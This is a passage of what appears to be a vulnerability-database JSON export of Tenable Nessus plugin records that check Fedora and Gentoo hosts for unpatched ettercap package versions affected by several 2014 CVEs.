"8fce9e3c8e65872eb4615fd74ef23a30", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "abea0b5753030c765870d7eb92cad5ba", "key": "description"}, {"hash": "3fdf6f59fda8391da686d86e3a4ebba5", "key": "sourceData"}, {"hash": "773dce44d11b3eb526a9b2dde74bba95", "key": "title"}, {"hash": "9da2a07af58b3eb890ec708d400d743c", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=80342", "id": "FEDORA_2014-17210.NASL", "lastseen": "2019-01-16T20:20:33", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "80342", "published": "2015-01-05T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1174821", "http://www.nessus.org/u?195ec4e5", "http://www.nessus.org/u?55000fec"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17210.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80342);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17210\");\n\n script_name(english:\"Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?195ec4e5\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"ettercap-0.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "title": "Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:20:33"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:ettercap"], "cvelist": ["CVE-2014-9381", "CVE-2014-9376", "CVE-2014-9377", "CVE-2014-6396", "CVE-2014-9378", "CVE-2014-9379", "CVE-2014-9380", "CVE-2014-6395"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "6e685d3366da9adae6b1ea5fc815df663c7dee67527215ffd0bd0da698d2292f", "hashmap": [{"hash": "159295b50f9d93a2f99cf6471805b8ab", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "86be0fa956e71c5ed59c4f008ad38617", "key": "references"}, {"hash": "d4acd75c362abdb9b13b54ce5ab478a6", "key": "cvelist"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "258f1404f999ee15929df2397cb1dfac", "key": "cpe"}, {"hash": "8fce9e3c8e65872eb4615fd74ef23a30", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "3fdf6f59fda8391da686d86e3a4ebba5", "key": "sourceData"}, {"hash": "773dce44d11b3eb526a9b2dde74bba95", "key": "title"}, {"hash": "9da2a07af58b3eb890ec708d400d743c", "key": "pluginID"}, {"hash": "89b897ffa1791367d61260d50e400cf5", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=80342", "id": "FEDORA_2014-17210.NASL", "lastseen": "2018-08-30T19:41:13", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "80342", "published": "2015-01-05T00:00:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1174821", "http://www.nessus.org/u?195ec4e5", "http://www.nessus.org/u?55000fec"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17210.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80342);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17210\");\n\n script_name(english:\"Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?195ec4e5\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"ettercap-0.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "title": "Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:41:13"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "258f1404f999ee15929df2397cb1dfac"}, {"key": "cvelist", "hash": "d4acd75c362abdb9b13b54ce5ab478a6"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "89b897ffa1791367d61260d50e400cf5"}, {"key": "href", "hash": "8fce9e3c8e65872eb4615fd74ef23a30"}, {"key": "modified", "hash": "9a00910eeedb8c835c4637a953896665"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "9da2a07af58b3eb890ec708d400d743c"}, {"key": "published", "hash": "159295b50f9d93a2f99cf6471805b8ab"}, {"key": "references", "hash": "86be0fa956e71c5ed59c4f008ad38617"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "3fdf6f59fda8391da686d86e3a4ebba5"}, {"key": "title", "hash": "773dce44d11b3eb526a9b2dde74bba95"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "2543b7aa1daabe465ec4b08c59cb0c36a7cbe118a824ad41cb6ec66bd2ac3f08", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201503-13", "ASA-201503-12"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121375", "OPENVAS:1361412562310869132", "OPENVAS:1361412562310869133", "OPENVAS:1361412562310868758", "OPENVAS:1361412562310868847", "OPENVAS:1361412562310868846", "OPENVAS:1361412562310869694"]}, {"type": "nessus", "idList": ["FEDORA_2014-17107.NASL", "FEDORA_2014-17090.NASL", "GENTOO_GLSA-201505-01.NASL", "DEBIAN_DLA-126.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14161", "SECURITYVULNS:DOC:31528"]}, {"type": "gentoo", "idList": ["GLSA-201505-01"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129673"]}, {"type": "cve", "idList": ["CVE-2014-9376", "CVE-2014-9378", "CVE-2014-9377", "CVE-2014-6395", "CVE-2014-9380", "CVE-2014-9381", "CVE-2014-6396", "CVE-2014-9379"]}, {"type": "debian", "idList": ["DEBIAN:DLA-126-1:8C386"]}, {"type": "zdt", "idList": ["1337DAY-ID-23028"]}, {"type": "exploitdb", "idList": ["EDB-ID:35580"]}], "modified": "2019-02-21T01:23:09"}, "score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17210.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80342);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17210\");\n\n script_name(english:\"Fedora 19 : ettercap-0.8.1-2.fc19 (2014-17210)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?195ec4e5\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"ettercap-0.8.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ettercap\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "80342", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:ettercap"], "scheme": null}

{"nessus": [{"lastseen": "2019-02-21T01:24:08", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201505-01 (Ettercap: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Ettercap. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2015-05-14T00:00:00", "id": "GENTOO_GLSA-201505-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83443", "published": "2015-05-14T00:00:00", "title": "GLSA-201505-01 : Ettercap: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201505-01.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83443);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2015/05/14 13:26:33 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"GLSA\", value:\"201505-01\");\n\n script_name(english:\"GLSA-201505-01 : Ettercap: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201505-01\n(Ettercap: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Ettercap. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201505-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Ettercap users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/ettercap-0.8.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/ettercap\", unaffected:make_list(\"ge 0.8.2\"), vulnerable:make_list(\"lt 0.8.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Ettercap\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:09", "bulletinFamily": "scanner", "description": "Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi- 1402/\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-17107.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80341", "published": "2015-01-05T00:00:00", "title": "Fedora 20 : ettercap-0.8.1-2.fc20 (2014-17107)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17107.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80341);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:30 $\");\n\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\", \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_bugtraq_id(71689, 71690, 71691, 71693, 71695, 71696, 71697, 71698);\n script_xref(name:\"FEDORA\", value:\"2014-17107\");\n\n script_name(english:\"Fedora 20 : ettercap-0.8.1-2.fc20 (2014-17107)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for multiple CVEs.\n\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-\n1402/\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1174821\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?588224f9\"\n );\n # https://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55000fec\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ettercap package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ettercap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"ettercap-0.8.1-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n 